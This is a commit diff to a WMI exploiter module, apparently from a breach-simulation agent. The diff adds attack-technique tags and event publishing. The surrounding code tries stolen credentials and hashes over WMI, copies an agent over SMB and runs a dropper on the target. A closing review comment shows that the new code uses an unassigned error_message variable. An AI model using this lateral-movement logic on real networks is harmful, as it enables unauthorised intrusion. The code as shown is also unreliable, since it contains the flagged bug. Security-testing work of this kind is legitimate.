Compare commits


4 Commits

Author SHA1 Message Date
Ilija Lazoroski d1427117c7 Agent: Add successful exploitation in WMI 2022-10-07 14:58:32 +02:00
Ilija Lazoroski 6950dcdf0c Agent: Change propagation timestamp in WMI 2022-10-07 14:49:49 +02:00
Ilija Lazoroski c09c2c2127 Agent: Add attack technique tags from WMIExploiter 2022-10-07 14:12:52 +02:00
Ilija Lazoroski ed191bcf61 Agent: Publish events from WMI 2022-10-07 13:55:49 +02:00
1 changed files with 32 additions and 15 deletions


@ -2,10 +2,16 @@ import logging
import ntpath import ntpath
import socket import socket
import traceback import traceback
from time import time
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.credentials import get_plaintext from common.credentials import get_plaintext
from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG,
T1105_ATTACK_TECHNIQUE_TAG,
T1110_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_agent_dst_path from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
WMI_EXPLOITER_TAG = "wmi-exploiter"
class WmiExploiter(HostExploiter): class WmiExploiter(HostExploiter):
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)" _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
_EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
_PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
@WmiTools.impacket_user @WmiTools.impacket_user
@WmiTools.dcom_wrap @WmiTools.dcom_wrap
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
wmi_connection = WmiTools.WmiConnection() wmi_connection = WmiTools.WmiConnection()
timestamp = time()
try: try:
wmi_connection.connect( wmi_connection.connect(
self.host, self.host,
@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
) )
except AccessDeniedException: except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI") error_message = f"Failed connecting to {self.host} using WMI"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue continue
except DCERPCException: except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(f"Failed connecting to {self.host} using WMI") logger.debug(f"Failed connecting to {self.host} using WMI")
self._publish_exploitation_event(timestamp, False, error_message=error_message)
continue continue
except socket.error: except socket.error:
logger.debug(f"Network error in WMI connection to {self.host}") error_message = f"Network error in WMI connection to {self.host}"
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result return self.exploit_result
except Exception as exc: except Exception as exc:
logger.debug( error_message = (
f"Unknown WMI connection error to {self.host}: " f"Unknown WMI connection error to {self.host}: "
f"{exc} {traceback.format_exc()}" f"{exc} {traceback.format_exc()}"
) )
logger.debug(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return self.exploit_result return self.exploit_result
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.exploit_result.exploitation_success = True self.exploit_result.exploitation_success = True
self._publish_exploitation_event(timestamp, True, error_message=error_message)
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
target_path = get_agent_dst_path(self.host) target_path = get_agent_dst_path(self.host)
propagation_timestamp = time()
remote_full_path = SmbTools.copy_file( remote_full_path = SmbTools.copy_file(
self.host, self.host,
downloaded_agent, downloaded_agent,
@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
if (0 != result.ProcessId) and (not result.ReturnValue): if (0 != result.ProcessId) and (not result.ReturnValue):
logger.info( logger.info(
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)", f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
remote_full_path, f"(pid={result.ProcessId}, cmdline={cmdline})"
self.host,
result.ProcessId,
cmdline,
) )
self.add_vuln_port(port="unknown") self.add_vuln_port(port="unknown")
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
self._publish_propagation_event(propagation_timestamp, True)
else: else:
error_message = ( error_message = (
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, " f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
"cmdline=%r)", f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
remote_full_path,
self.host,
result.ProcessId,
result.ReturnValue,
cmdline,
) )
logger.debug(error_message) logger.debug(error_message)
self.exploit_result.error_message = error_message self.exploit_result.error_message = error_message
self._publish_propagation_event(
propagation_timestamp, False, error_message=error_message
)
result.RemRelease() result.RemRelease()
wmi_connection.close() wmi_connection.close()
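Review bot: `error_message` is handed to `_publish_exploitation_event` on the success path (right after `exploitation_success = True`) and in the `except DCERPCException` handler without being assigned in either place, so a first-attempt success or DCERPC failure raises UnboundLocalError, and on later credential iterations the published event carries the stale message from an earlier failed attempt. Drop the argument on success, `self._publish_exploitation_event(timestamp, True)`, and assign it in the DCERPC branch, `error_message = f"Failed connecting to {self.host} using WMI"` before the `logger.debug` call, mirroring the `AccessDeniedException` branch. Separately, the generic `except Exception` branch now places `traceback.format_exc()` in the event's `error_message` rather than only in a debug log; if these events are forwarded off the agent, consider logging the traceback locally and publishing only `str(exc)`. `_exploit_host` begins before this file's first visible hunk, so the loop header and any earlier definition of `error_message` are not visible here.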